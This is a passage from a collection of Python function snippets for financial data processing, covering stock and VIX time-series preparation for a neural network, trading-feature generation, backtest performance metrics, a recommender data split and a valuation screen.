gas_data.append(gas.value_gas[i-1])\r\n \r\n \r\n gas = pd.DataFrame(data = gas_data, index = gas_ind, columns = [\"value_gas\"])\r\n # Cleaning, processing and transforming the Volatility data\r\n v_data = si.get_data(\"^VIX\")\r\n v_data.drop([\"ticker\", \"volume\", 'open', 'high', 'low', 'close'], axis=1, inplace=True)\r\n v_data.columns = [\"adjclose_v\"]\r\n \r\n v_data_ind = []\r\n v_data_data = []\r\n for i in range(1, len(v_data.index)):\r\n if(v_data.index[i-1].day != v_data.index[i].day-1):\r\n for k in range(v_data.index[i].day - v_data.index[i-1].day):\r\n try:\r\n v_data_ind.append(datetime(v_data.index[i-1].year, v_data.index[i-1].month, v_data.index[i-1].day+k))\r\n v_data_data.append(v_data.adjclose_v[i-1])\r\n except:\r\n pass\r\n else:\r\n v_data_ind.append(v_data.index[i-1])\r\n v_data_data.append(v_data.adjclose_v[i-1])\r\n \r\n \r\n v_data = pd.DataFrame(data = v_data_data, index = v_data_ind, columns = [\"adjclose_v\"])\r\n \r\n # see if ticker is already a loaded stock from yahoo finance\r\n if isinstance(ticker, str):\r\n # load it from yahoo_fin library\r\n df = si.get_data(ticker)\r\n elif isinstance(ticker, pd.DataFrame):\r\n # already loaded, use it directly\r\n df = ticker\r\n else:\r\n raise TypeError(\"ticker can be either a str or a `pd.DataFrame` instances\")\r\n df_ind = []\r\n df_data = {\"open\":[], \"high\":[], \"low\":[], \"close\":[], \"adjclose\":[], \"volume\":[], \"ticker\":[]}\r\n for i in range(1, len(df.index)):\r\n if(df.index[i-1].day != df.index[i].day-1):\r\n for k in range(df.index[i].day - df.index[i-1].day):\r\n try:\r\n df_ind.append(datetime(df.index[i-1].year, df.index[i-1].month, df.index[i-1].day+k))\r\n df_data[\"open\"].append(df.open[i-1])\r\n df_data[\"high\"].append(df.high[i-1])\r\n df_data[\"low\"].append(df.low[i-1])\r\n df_data[\"close\"].append(df.close[i-1])\r\n df_data[\"adjclose\"].append(df.adjclose[i-1])\r\n df_data[\"volume\"].append(df.volume[i-1])\r\n df_data[\"ticker\"].append(df.ticker[i-1])\r\n except:\r\n pass\r\n else:\r\n df_ind.append(df.index[i-1])\r\n df_data[\"open\"].append(df.open[i-1])\r\n df_data[\"high\"].append(df.high[i-1])\r\n df_data[\"low\"].append(df.low[i-1])\r\n df_data[\"close\"].append(df.close[i-1])\r\n df_data[\"adjclose\"].append(df.adjclose[i-1])\r\n df_data[\"volume\"].append(df.volume[i-1])\r\n df_data[\"ticker\"].append(df.ticker[i-1])\r\n df = pd.DataFrame(data = df_data, index = df_ind) \r\n final_df = pd.concat([df, v_data, gas, silver, gold, new_usd, pmi], axis=1, join=\"inner\")\r\n print(final_df.columns)\r\n # this will contain all the elements we want to return from this function\r\n result = {}\r\n # we will also return the original dataframe itself\r\n result['final_df'] = final_df.copy()\r\n # make sure that the passed feature_columns exist in the dataframe\r\n for col in feature_columns:\r\n assert col in final_df.columns, f\"'{col}' does not exist in the dataframe.\"\r\n\r\n if scale:\r\n column_scaler = {}\r\n # scale the data (prices) from 0 to 1\r\n for column in feature_columns:\r\n scaler = preprocessing.MinMaxScaler()\r\n final_df[column] = scaler.fit_transform(np.expand_dims(final_df[column].values, axis=1))\r\n column_scaler[column] = scaler\r\n\r\n # add the MinMaxScaler instances to the result returned\r\n result[\"column_scaler\"] = column_scaler\r\n\r\n # add the target column (label) by shifting by `lookup_step`\r\n final_df['future'] = final_df['adjclose'].shift(-lookup_step)\r\n\r\n # last `lookup_step` columns contains NaN in future column\r\n # get them before droping NaNs\r\n last_sequence = np.array(final_df[feature_columns].tail(lookup_step))\r\n \r\n # drop NaNs\r\n final_df.dropna(inplace=True)\r\n\r\n sequence_data = []\r\n sequences = deque(maxlen=n_steps)\r\n\r\n for entry, target in zip(final_df[feature_columns].values, final_df['future'].values):\r\n sequences.append(entry)\r\n if len(sequences) == n_steps:\r\n sequence_data.append([np.array(sequences), target])\r\n\r\n # get the last sequence by appending the last `n_step` sequence with `lookup_step` sequence\r\n # for instance, if n_steps=50 and lookup_step=10, last_sequence should be of 59 (that is 50+10-1) length\r\n # this last_sequence will be used to predict in future dates that are not available in the dataset\r\n last_sequence = list(sequences) + list(last_sequence)\r\n # shift the last sequence by -1\r\n last_sequence = np.array(pd.DataFrame(last_sequence).shift(-1).dropna())\r\n # add to result\r\n result['last_sequence'] = last_sequence\r\n \r\n # construct the X's and y's\r\n X, y = [], []\r\n for seq, target in sequence_data:\r\n X.append(seq)\r\n y.append(target)\r\n\r\n # convert to numpy arrays\r\n X = np.array(X)\r\n y = np.array(y)\r\n\r\n # reshape X to fit the neural network\r\n X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))\r\n \r\n # split the dataset\r\n result[\"X_train\"], result[\"X_test\"], result[\"y_train\"], result[\"y_test\"] = train_test_split(X, y, \r\n test_size=test_size, shuffle=shuffle)\r\n # return the result\r\n return result", "def assign_labels(data, holding_period=pd.Timedelta(hours=1),\\\n volatility_window=pd.Timedelta(hours=1), factors = [2, 2]):\n\n data = data.assign(tickDirection=_get_direction(data.close),\n closeLag1Hr=_get_ts_lag(data.close, lag=pd.Timedelta(hours=1)))\n data = data.assign(return1Hr=data.closeLag1Hr/data.close - 1).dropna()\n\n # add thresholds and vertical barrier (t1) columns\n data = data.assign(threshold=_get_volatility(data.close, delta=volatility_window), \n t1=_get_verticals(data, delta=holding_period)).dropna()\n\n # events are [t1, threshold, side]\n events = data[['t1', 'threshold']]\n events = events.assign(side=pd.Series(1., events.index)) # long only\n\n # get the timestamps for [t1, stop_loss, take_profit]\n touches = _get_horizontals(data, factors)\n # assign labels based on which barrier is hit first\n touches = _get_labels(touches)\n\n # add touches timestamps and label\n data = pd.concat( [data.loc[:, 'vwap':'threshold'], \n touches.loc[:, 't1':'label']], axis=1)\n \n return data", "def getUserHistFeatures(transaction_list, coupon_dict, model_start_date, purchase_date):\n feat_header = [\"NoOfPurchases\", \"DaysSinceLastPurchase\", \"NoOfPurchasesLastweek\", \"NoOfPurchasesLast15Days\", \"NoOfPurchasesLast30Days\", \"NoOfPurchasesLast60Days\", \"NoOfPurchasesLast90Days\", \"NoOfPurchasesLast180Days\", \"DaysSincePrevPurchase\", \"NoOfPurchasesPrevweek\", \"NoOfPurchasesPrev15Days\", \"NoOfPurchasesPrev30Days\", \"NoOfPurchasesPrev60Days\", \"NoOfPurchasesPrev90Days\", \"NoOfPurchasesPrev180Days\"]\n\n # getting number of purchases #\n feat_list = [len(transaction_list)]\n\n # initializing variables #\n purchase_small_area_name_dict = {}\n puchase_date_list = []\n capsule_text_dict = {}\n genre_name_dict = {}\n price_rate_list = []\n catalog_price_list = []\n discount_price_list = []\n dispperiod_list = []\n valid_period_list = []\n usable_date_mon_list = {}\n usable_date_tue_list = {}\n usable_date_wed_list = {}\n usable_date_thu_list = {}\n usable_date_fri_list = {}\n usable_date_sat_list = {}\n usable_date_sun_list = {}\n usable_date_hol_list = {}\n usable_date_before_hol_list = {}\n coupon_large_area_name_dict = {}\n coupon_small_area_name_dict = {}\n coupon_ken_name_dict = {}\n days_since_last_purchase = 9999\n last_week_purchase = 0\n last_fifteendays_purchase = 0\n last_thirtydays_purchase = 0\n last_sixtydays_purchase = 0\n last_nintydays_purchase = 0\n\tlast_oneeightydays_purchase = 0\n\tdays_since_prev_purchase = 9999\n\tprev_week_purchase = 0\n prev_fifteendays_purchase = 0\n prev_thirtydays_purchase = 0\n prev_sixtydays_purchase = 0\n prev_nintydays_purchase = 0\n prev_oneeightydays_purchase = 0\n for transaction in transaction_list:\n diff_days = (model_start_date - datetime.datetime.strptime(transaction['I_DATE'], \"%Y-%m-%d %H:%M:%S\").date()).days\n if diff_days < days_since_last_purchase:\n days_since_last_purchase = diff_days\n if diff_days <= 7:\n last_week_purchase += 1\n if diff_days <= 15:\n last_fifteendays_purchase += 1\n if diff_days <= 30:\n last_thirtydays_purchase += 1\n if diff_days <= 60:\n last_sixtydays_purchase += 1\n if diff_days <= 90:\n last_nintydays_purchase += 1\n\t\tif diff_days <= 180:\n last_oneeightydays_purchase += 1\n\t\t\n\t\tdiff_days = (purchase_date - datetime.datetime.strptime(transaction['I_DATE'], \"%Y-%m-%d %H:%M:%S\").date()).days\n if diff_days < days_since_last_purchase:\n days_since_prev_purchase = diff_days\n if diff_days <= 7:\n prev_week_purchase += 1\n if diff_days <= 15:\n prev_fifteendays_purchase += 1\n if diff_days <= 30:\n prev_thirtydays_purchase += 1\n if diff_days <= 60:\n prev_sixtydays_purchase += 1\n if diff_days <= 90:\n prev_nintydays_purchase += 1\n if diff_days <= 180:\n prev_oneeightydays_purchase += 1\n\n coupon_id_dict = coupon_dict[ transaction['COUPON_ID_hash'] ]\n purchase_small_area_name_dict[transaction['SMALL_AREA_NAME']] = purchase_small_area_name_dict.get( transaction['SMALL_AREA_NAME'],0) + 1\n capsule_text_dict[ coupon_id_dict['CAPSULE_TEXT'] ] = capsule_text_dict.get( coupon_id_dict['CAPSULE_TEXT'], 0) + 1\n genre_name_dict[ coupon_id_dict['GENRE_NAME'] ] = genre_name_dict.get( coupon_id_dict['GENRE_NAME'],0 ) + 1\n coupon_large_area_name_dict[ coupon_id_dict['large_area_name'] ] = coupon_large_area_name_dict.get( coupon_id_dict['large_area_name'],0 ) + 1\n coupon_small_area_name_dict[ coupon_id_dict['small_area_name'] ] = coupon_small_area_name_dict.get( coupon_id_dict['small_area_name'],0 ) + 1\n coupon_ken_name_dict[ coupon_id_dict['ken_name'] ] = coupon_ken_name_dict.get( coupon_id_dict['ken_name'],0 ) + 1\n price_rate_list.append( float(coupon_id_dict['PRICE_RATE']) )\n catalog_price_list.append( float(coupon_id_dict['CATALOG_PRICE']) )\n discount_price_list.append( float(coupon_id_dict['DISCOUNT_PRICE']) )\n dispperiod_list.append( float(coupon_id_dict['DISPPERIOD']) )\n if coupon_id_dict['VALIDPERIOD'] not in ('','NA'):\n valid_period_list.append( float(coupon_id_dict['VALIDPERIOD']) )\n if coupon_id_dict['USABLE_DATE_MON'] not in ('','NA'):\n usable_date_mon_list[ float(coupon_id_dict['USABLE_DATE_MON']) ] = usable_date_mon_list.get( float(coupon_id_dict['USABLE_DATE_MON']),0 ) + 1\n usable_date_tue_list[ float(coupon_id_dict['USABLE_DATE_TUE']) ] = usable_date_tue_list.get( float(coupon_id_dict['USABLE_DATE_TUE']),0 ) + 1\n usable_date_wed_list[ float(coupon_id_dict['USABLE_DATE_WED']) ] = usable_date_wed_list.get( float(coupon_id_dict['USABLE_DATE_WED']),0 ) + 1\n usable_date_thu_list[ float(coupon_id_dict['USABLE_DATE_THU']) ] = usable_date_thu_list.get( float(coupon_id_dict['USABLE_DATE_THU']),0 ) + 1\n usable_date_fri_list[ float(coupon_id_dict['USABLE_DATE_FRI']) ] = usable_date_fri_list.get( float(coupon_id_dict['USABLE_DATE_FRI']),0 ) + 1\n usable_date_sat_list[ float(coupon_id_dict['USABLE_DATE_SAT']) ] = usable_date_sat_list.get( float(coupon_id_dict['USABLE_DATE_SAT']),0 ) + 1\n usable_date_sun_list[ float(coupon_id_dict['USABLE_DATE_SUN']) ] = usable_date_sun_list.get( float(coupon_id_dict['USABLE_DATE_SUN']),0 ) + 1\n usable_date_hol_list[ float(coupon_id_dict['USABLE_DATE_HOLIDAY']) ] = usable_date_hol_list.get( float(coupon_id_dict['USABLE_DATE_HOLIDAY']),0 ) + 1\n usable_date_before_hol_list[ float(coupon_id_dict['USABLE_DATE_BEFORE_HOLIDAY']) ] = usable_date_before_hol_list.get( float(coupon_id_dict['USABLE_DATE_BEFORE_HOLIDAY']),0 )+1\n else:\n usable_date_mon_list[3.0] = usable_date_mon_list.get( 3.0,0 ) + 1\n usable_date_tue_list[3.0] = usable_date_tue_list.get( 3.0,0 ) + 1\n usable_date_wed_list[3.0] = usable_date_wed_list.get( 3.0,0 ) + 1\n usable_date_thu_list[3.0] = usable_date_thu_list.get( 3.0,0 ) + 1\n usable_date_fri_list[3.0] = usable_date_fri_list.get( 3.0,0 ) + 1\n usable_date_sat_list[3.0] = usable_date_sat_list.get( 3.0,0 ) + 1\n usable_date_sun_list[3.0] = usable_date_sun_list.get( 3.0,0 ) + 1\n usable_date_hol_list[3.0] = usable_date_hol_list.get( 3.0,0 ) + 1\n usable_date_before_hol_list[3.0] = usable_date_before_hol_list.get( 3.0,0 ) + 1\n\n feat_list.extend([days_since_last_purchase, last_week_purchase, last_fifteendays_purchase, last_thirtydays_purchase, last_sixtydays_purchase, last_nintydays_purchase, last_oneeightydays_purchase, days_since_prev_purchase, prev_week_purchase, prev_fifteendays_purchase, prev_thirtydays_purchase, prev_sixtydays_purchase, prev_nintydays_purchase, prev_oneeightydays_purchase])\n return feat_list, feat_header, [purchase_small_area_name_dict, capsule_text_dict, genre_name_dict, coupon_large_area_name_dict, coupon_small_area_name_dict, coupon_ken_name_dict, price_rate_list, catalog_price_list, discount_price_list, dispperiod_list, valid_period_list, usable_date_mon_list, usable_date_tue_list, usable_date_wed_list, usable_date_thu_list, usable_date_fri_list, usable_date_sat_list, usable_date_sun_list, usable_date_hol_list, usable_date_before_hol_list]", "def preprocess(data):\n # Data Preprocessing\n data['GDP_scaled']=preprocessing.scale(data['GDP'])\n data['CLPRB_scaled']=preprocessing.scale(data['CLPRB'])\n data['EMFDB_scaled']=preprocessing.scale(data['EMFDB'])\n data['ENPRP_scaled']=preprocessing.scale(data['ENPRP'])\n data['NGMPB_scaled']=preprocessing.scale(data['NGMPB'])\n data['PAPRB_scaled']=preprocessing.scale(data['PAPRB'])\n data['PCP_scaled']=preprocessing.scale(data['PCP'])\n data['ZNDX_scaled']=preprocessing.scale(data['ZNDX'])\n data['OP_scaled']=preprocessing.scale(data['Nominal Price'])\n data['OP2_scaled']=preprocessing.scale(data['Inflation Adjusted Price'])\n\n return data", "def generate_features(df):\n df_new = pd.DataFrame()\n \n # 6 original features\n df_new['open'] = df['open']\n df_new['open_1'] = df['open'].shift(1)\n df_new['close_1'] = df['close'].shift(1)\n df_new['high_1'] = df['high'].shift(1)\n df_new['low_1'] = df['low'].shift(1)\n df_new['volume_1'] = df['volume'].shift(1)\n \n # 50 original features\n # average price\n df_new['avg_price_5'] = df['close'].rolling(window=5).mean().shift(1)\n df_new['avg_price_30'] = df['close'].rolling(window=21).mean().shift(1)\n df_new['avg_price_90'] = df['close'].rolling(window=63).mean().shift(1)\n df_new['avg_price_365'] = df['close'].rolling(window=252).mean().shift(1)\n \n # average price ratio\n df_new['ratio_avg_price_5_30'] = df_new['avg_price_5'] / df_new['avg_price_30']\n df_new['ratio_avg_price_905_'] = df_new['avg_price_5'] / df_new['avg_price_90']\n df_new['ratio_avg_price_5_365'] = df_new['avg_price_5'] / df_new['avg_price_365']\n df_new['ratio_avg_price_30_90'] = df_new['avg_price_30'] / df_new['avg_price_90']\n df_new['ratio_avg_price_30_365'] = df_new['avg_price_30'] / df_new['avg_price_365']\n df_new['ratio_avg_price_90_365'] = df_new['avg_price_90'] / df_new['avg_price_365'] \n \n \n # average volume\n df_new['avg_volume_5'] = df['volume'].rolling(window=5).mean().shift(1)\n df_new['avg_volume_30'] = df['volume'].rolling(window=21).mean().shift(1)\n df_new['avg_volume_90'] = df['volume'].rolling(window=63).mean().shift(1)\n df_new['avg_volume_365'] = df['volume'].rolling(window=252).mean().shift(1)\n \n #average volume ratio\n df_new['ratio_avg_volume_5_30'] = df_new['avg_volume_5'] / df_new['avg_volume_30']\n df_new['ratio_avg_volumee_5_90'] = df_new['avg_volume_5'] / df_new['avg_volume_90'] \n df_new['ratio_avg_volume_5_365'] = df_new['avg_volume_5'] / df_new['avg_volume_365']\n df_new['ratio_avg_volume_30_90'] = df_new['avg_volume_30'] / df_new['avg_volume_90']\n df_new['ratio_avg_volume_30_365'] = df_new['avg_volume_30'] / df_new['avg_volume_365']\n df_new['ratio_avg_volume_90_365'] = df_new['avg_volume_90'] / df_new['avg_volume_365'] \n \n \n # standard deviation of prices\n df_new['std_price_5'] = df['close'].rolling(window=5).std().shift(1)\n df_new['std_price_30'] = df['close'].rolling(window=21).std().shift(1)\n df_new['std_price_90'] = df['close'].rolling(window=63).std().shift(1) \n df_new['std_price_365'] = df['close'].rolling(window=252).std().shift(1)\n \n # standard deviation ratio of prices \n df_new['ratio_std_price_5_30'] = df_new['std_price_5'] / df_new['std_price_30']\n df_new['ratio_std_price_5_90'] = df_new['std_price_5'] / df_new['std_price_90']\n df_new['ratio_std_price_5_365'] = df_new['std_price_5'] / df_new['std_price_365']\n df_new['ratio_std_price_30_90'] = df_new['std_price_30'] / df_new['std_price_90'] \n df_new['ratio_std_price_30_365'] = df_new['std_price_30'] / df_new['std_price_365'] \n df_new['ratio_std_price_90_365'] = df_new['std_price_90'] / df_new['std_price_365'] \n \n \n # standard deviation of volumes\n df_new['std_volume_5'] = df['volume'].rolling(window=5).std().shift(1)\n df_new['std_volume_30'] = df['volume'].rolling(window=21).std().shift(1)\n df_new['std_volume_90'] = df['volume'].rolling(window=63).std().shift(1)\n df_new['std_volume_365'] = df['volume'].rolling(window=252).std().shift(1)\n \n #standard deviation ratio of volumes\n df_new['ratio_std_volume_5_30'] = df_new['std_volume_5'] / df_new['std_volume_30']\n df_new['ratio_std_volume_5_90'] = df_new['std_volume_5'] / df_new['std_volume_90']\n df_new['ratio_std_volume_5_365'] = df_new['std_volume_5'] / df_new['std_volume_365'] \n df_new['ratio_std_volume_30_90'] = df_new['std_volume_30'] / df_new['std_volume_90']\n df_new['ratio_std_volume_30_365'] = df_new['std_volume_30'] / df_new['std_volume_365']\n df_new['ratio_std_volume_90_365'] = df_new['std_volume_90'] / df_new['std_volume_365'] \n \n # return\n df_new['return_1'] = ((df['close'] - df['close'].shift(1)) / df['close'].shift(1)).shift(1)\n df_new['return_5'] = ((df['close'] - df['close'].shift(5)) / df['close'].shift(5)).shift(1)\n df_new['return_30'] = ((df['close'] - df['close'].shift(21)) / df['close'].shift(21)).shift(1)\n df_new['return_90'] = ((df['close'] - df['close'].shift(63)) / df['close'].shift(63)).shift(1) \n df_new['return_365'] = ((df['close'] - df['close'].shift(252)) / df['close'].shift(252)).shift(1)\n \n #average of return\n df_new['moving_avg_5'] = df_new['return_1'].rolling(window=5).mean()\n df_new['moving_avg_30'] = df_new['return_1'].rolling(window=21).mean()\n df_new['moving_avg_90'] = df_new['return_1'].rolling(window=63).mean()\n df_new['moving_avg_365'] = df_new['return_1'].rolling(window=252).mean()\n \n # the target\n df_new['close'] = df['close']\n df_new = df_new.dropna(axis=0)\n return df_new", "def getIdealSec(context, data): #This replaced before_trading_start(context, data)\n record(Leverage = \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t context.account.leverage,pos=len(context.portfolio.positions))\n context.output = pipeline_output('my_pipeline')\n #print('Pipeout: ')\n #print(context.output)\n \n # These are the securities that we are interested in trading each day.\n # Note: As it stands, the securities in this list are from two different industries (defense and\n # consumer electronics). Although more computationally expensive then dividing them out into their \n # two respective industries prior to cross correlating, leaving them in the same matrix/data set and \n # cross correlating them gives us a way to 'check' that the crosscorrelation is valid, since securities within the same industry should typically cross correlate to a higher degree than across industries. ***\n context.security_list = context.output.index \n context.defenseList = context.output[context.output['defenseFilt']].index.tolist()\n #print(context.defenseList)\n context.autoList = context.output[context.output['autoFilt']].index.tolist()\n #print(context.autoList)\n context.chemList = context.output[context.output['chemFilt']].index.tolist()\n #print(context.chemList)\n context.techList = context.output[context.output['techFilt']].index.tolist()\n #print(context.techList)\n context.depList = context.output[context.output['depFilt']].index.tolist()\n # Within each sector, calculate the mean (and max, since we may choose only to trade the maximally correlated securities regardless of industry) crosscorrelation between all combinations of stocks. \n #This will only run every trading day to prevent computational expense. In that \n #respect, performs identically to a pipeline add-on (but allows the use of \"history\") \n #Try block here incase pipe returns no valid securities. \n try:\n \tprice_history = np.transpose(data.history(context.security_list, fields=\"price\", bar_count=context.lookback,frequency=\"1m\"))\n \tprice_history=price_history.as_matrix()\n except:\n price_history=[[0],[0],[0]]\n #This returns three arrays, containing a filtered set of maximally cross correlated securities within the last time range (given by context.lookback), their associated (and filtered) time delays corresponding to their maximum correlation, and the degree of their correlation in the given time frame. Essentially, since tau has already been filtered for, the degree of their correlation should be used as a confidence feature to make predictions off of, and tau should be used to determine when to make purchases/sales. \n #hCorrVals,maxSecs,timeDelays,short_timeDelays=crossCorr(context.security_list,price_history,context)\n #The best securities to trade using this algorithm (each day) are listed in the below lists ***\n try:\n \thCorrVals,maxSecs,timeDelays,short_timeDelays=crossCorr(context.security_list,price_history,context) \n except: \n print('Crosscorr Failed')\n maxSecs,hCorrVals,timeDelays,short_timeDelays=[],[],[],[]\n #\"Globalize\" the returned information so that we can handle these commodities every minute. \n context.Securities=maxSecs\n context.CorrVals=hCorrVals\n context.timeDelays=short_timeDelays #************Used to be timeDelays, now however, we calculate a more recent tau\n context.actionList,context.timerList,context.tradeList,context.tradingNow=[0]*len(context.Securities),[0]*len(context.Securities),[0]*len(context.Securities),[0]*len(context.Securities) #list of zeros indicating that no stocks should currently be trading\n #(Note that all stocks should be sold at end of every tradinng day.) ", "def calc_performance(self):\n for symbol in self.portfolio.assets.keys():\n\n # Total the Performance of all the trades\n start = self.portfolio.trades[symbol].index[0]\n end = self.portfolio.trades[symbol].index[-1]\n trades = len(self.record[symbol])\n profit = self.record[symbol]['profit'].sum()\n loss = self.record[symbol]['loss'].sum()\n # Total or average the trade info for all the trades\n try:\n wins = len(self.record[symbol].groupby('win/loose').groups['w'])\n except (ValueError, KeyError):\n wins = 0\n try:\n losses = len(self.record[symbol].groupby('win/loose').groups['l'])\n except (ValueError, KeyError):\n losses = 0\n try:\n washes = len(self.record[symbol].groupby('win/loose').groups['-'])\n except (ValueError, KeyError):\n washes = 0\n max_drawdown = self.record[symbol]['drawdown'].max()\n average_drawdown = self.record[symbol]['drawdown'].mean()\n max_drawdown_time = self.record[symbol]['drawdown days'].max()\n average_drawdown_time = self.record[symbol]['drawdown days'].mean()\n # Average the risk and market comparisons for all trades\n vol_risk = self.record[symbol]['volatility'].mean()\n beta = self.record[symbol]['beta'].mean()\n lpm_risk = self.record[symbol]['lpm'].mean()\n e_r = self.record[symbol]['expected_return'].mean()\n # Calculate Risk measures\n treynor_ratio = (e_r - self.risk_free_return) / beta\n sharpe_ratio = (e_r - self.risk_free_return) / vol_risk\n # Package up the data for each symbol\n self.performance[symbol] = {\n 'start': start,\n 'end': end,\n 'trades': trades,\n 'wins': wins,\n 'losses': losses,\n 'washes': washes,\n 'profit': profit,\n 'loss': loss,\n 'net_profit': profit - loss,\n 'profit_factor': profit / loss if loss != 0 else 1.0,\n 'percent_profitable': wins / trades if trades != 0 else 0.0,\n 'average_trade_net_profit' : (profit - loss) / trades if trades != 0 else 0.0,\n 'max_drawdown' : max_drawdown,\n 'average_drawdown' : average_drawdown,\n 'max_drawdown_days' : max_drawdown_time,\n 'average_drawdown_days' : average_drawdown_time,\n 'volatility_risk' : vol_risk,\n 'beta' : beta,\n 'lower_partial_moment_risk' : lpm_risk,\n 't_r' : treynor_ratio,\n 's_r' : sharpe_ratio\n }\n\n return self", "def FormatAndSplit(df, cut_date):\n \n idx = np.isnan(df['NotionalEUR'])\n df = df.ix[~idx, :]\n ticker_idx = {tck: i for i, tck in enumerate(set(df['Ticker']))}\n df['TradeDateKey'] = pd.to_datetime(df['TradeDateKey'], format='%Y%m%d')\n train = df.ix[df[u'TradeDateKey'] <= cut_date, :]\n test = df.ix[df[u'TradeDateKey'] > cut_date, :]\n \n ddata = df.ix[df[\"BuySell\"] == \"Buy\", [u'CustomerNameIdx', u'NotionalEUR', u'Ticker', u'TradeDateKey']]\n\n data_train = pd.DataFrame.copy(ddata)\n data_train.ix[data_train[u'TradeDateKey'] <= cut_date, \"NotionalEUR\"] = 0\n \n data_test = pd.DataFrame.copy(ddata)\n data_test.ix[data_test[u'TradeDateKey'] > cut_date, \"NotionalEUR\"] = 0\n \n # Bucket ratings into quantiles.\n cut_count = 10\n n_bins = 4\n labels = range(1, n_bins + 1)\n \n train_dense = data_train.groupby(['CustomerNameIdx', 'Ticker'])\n train_dense = (train_dense['NotionalEUR']\n .agg({'NotionalSum' : np.sum, 'count' : 'count'})\n .reset_index())\n train_dense = (train_dense\n .groupby('CustomerNameIdx')\n .filter(lambda x: sum(x['count']) >= cut_count))\n# train_dense[u'NotionalRating'], bins = pd.qcut(\n# train_dense[u'NotionalSum'], n_bins, labels=labels, retbins=True)\n train_dense[u'NotionalRating'] = train_dense[u'NotionalSum']\n \n test_dense = data_test.groupby(['CustomerNameIdx', 'Ticker'])\n test_dense = (test_dense['NotionalEUR']\n .agg({'NotionalSum' : np.sum, 'count' : 'count'})\n .reset_index())\n test_dense = (test_dense.groupby('CustomerNameIdx')\n .filter(lambda x: sum(x['count']) >= cut_count))\n# test_dense[u'NotionalRating'] = pd.cut(\n# test_dense[u'NotionalSum'], bins, labels=labels)\n test_dense[u'NotionalRating'] = test_dense[u'NotionalSum']\n \n train_dense['Ticker'] = train_dense['Ticker'].map(lambda x: ticker_idx[x])\n test_dense['Ticker'] = test_dense['Ticker'].map(lambda x: ticker_idx[x])\n \n train_dense.drop(['count', 'NotionalSum'], axis=1, inplace=True)\n test_dense.drop(['count', 'NotionalSum'], axis=1, inplace=True)\n \n # Remove empty rows\n idx = ~np.isnan(np.array(train_dense['NotionalRating']))\n train_dense = train_dense[idx]\n idx = ~np.isnan(np.array(test_dense['NotionalRating']))\n test_dense = test_dense[idx]\n \n nb_CustomerNameIdxs = len(set(df['CustomerNameIdx']))\n nb_tickers = len(set(df['Ticker']))\n \n return (train, \n ToSparse(train_dense, nrow=nb_CustomerNameIdxs, ncol=nb_tickers),\n test, \n ToSparse(test_dense, nrow=nb_CustomerNameIdxs, ncol=nb_tickers), \n ticker_idx)", "def price_to_seven_year_earnings_ratio_less_than_25(self):\n\n note = ''\n # check if 'EPS' exists\n if 'EPS' not in self.stock.main_df.columns:\n note = note + 'Could not find EPS on MacroTrends. '\n\n # check if Current price is not 0\n if self.stock.stats_dict['Current Price'] == 0:\n note = note + 'Could not find current price on MacroTrends. '\n\n if note != '':\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', 'N/A', 'N/A', note)\n return\n\n curr_price = self.stock.stats_dict['Current Price']\n df = self.stock.main_df\n\n average = 0\n # i want to use previous year if current year is empty\n if not np.isnan(df.iloc[0]['EPS']):\n # present year is there\n past_7_years_df = df.iloc[0: 7]['EPS']\n average = past_7_years_df.mean()\n elif np.isnan(df.iloc[0]['EPS']):\n # present year is not there\n past_7_years_df = df.iloc[1: 8]['EPS']\n average = past_7_years_df.mean()\n if np.isnan(df.iloc[1]['EPS']):\n # past year is not there either\n past_7_years_df = df.iloc[2: 9]['EPS']\n average = past_7_years_df.mean()\n if np.isnan(df.iloc[2]['EPS']):\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', 'N/A', 'N/A',\n 'Must not have filed their annual report for {}'.format(\n self.current_year - 2))\n return\n\n if average == 0:\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', 'N/A', 'N/A',\n 'No average found')\n return\n elif (curr_price / average) <= 25:\n criteria_passed = 'Yes'\n else:\n criteria_passed = 'No'\n\n self.stock.append_calc_result('7 year P/E ratio < 25 ?', round((curr_price / average), 2),\n criteria_passed, '7 Year Average EPS = {}'.format(round(average, 2)))", "def scoreCompanies(self, companies):\n company_list = self.company\n tier = []\n business_type = ['inc', 'solutions', 'pvt.', 'pvt', 'private', 'ltd', 'limited', 'business']\n\n companies = [' '.join(w for w in company.split() if w.lower() not in business_type)\n for company in companies]\n\n for company in companies:\n match_score = []\n for company_name in company_list['company_name']:\n try:\n match_score.append(fuzz.partial_ratio(str(company_name), str(company)))\n except KeyError, e:\n match_score.append(0)\n\n try:\n if max(match_score) > 70:\n tier.append(company_list['tier'][match_score.index(max(match_score))])\n else:\n tier.append(1)\n except KeyError as e:\n tier.append(1)\n\n try:\n avg_score = (sum(tier)/len(tier))/4\n except:\n avg_score = 0\n\n return avg_score", "def portfolio_performance(returns,weights):\r\n print('Calculating Portfolio Performance')\r\n # returns=target_asset_port_data_attributes['component_returns']\r\n # weights =target_asset_port_data_attributes['effective_weights']\r\n\r\n component_returns= returns\r\n compnent_weights = pd.DataFrame(data=np.nan,index= component_returns.index,columns=component_returns.columns)\r\n compnent_weights.loc[weights.index,:] = weights\r\n\r\n portfolio_dates = component_returns.index\r\n components = component_returns.columns\r\n\r\n # pre-allocate\r\n BoP_df = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=components)\r\n EoP_df = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=components)\r\n PnL_df = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=components)\r\n portfolio_BoP = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=['Portfolio BoP'])\r\n portfolio_EoP = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=['Portfolio EoP'])\r\n portfolio_PnL = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=['Portfolio PnL'])\r\n \r\n portfolio_index = pd.DataFrame(data=np.nan,index=portfolio_dates,columns=['Index'])\r\n previous_index_value = np.int64(1)\r\n\r\n pre_date = portfolio_dates[0]\r\n # set BoP to start weights\r\n for date,row in component_returns.iterrows():\r\n # print(date)\r\n # 1st date\r\n if date == portfolio_dates[0]:\r\n BoP_df.loc[date] = compnent_weights.iloc[0,:]\r\n EoP_df.loc[date] = BoP_df.loc[date] * (1+component_returns.loc[date])\r\n PnL_df.loc[date] = EoP_df.loc[date].subtract(BoP_df.loc[date])\r\n\r\n portfolio_BoP.loc[date] = BoP_df.loc[date].sum()\r\n portfolio_EoP.loc[date] = EoP_df.loc[date].sum()\r\n 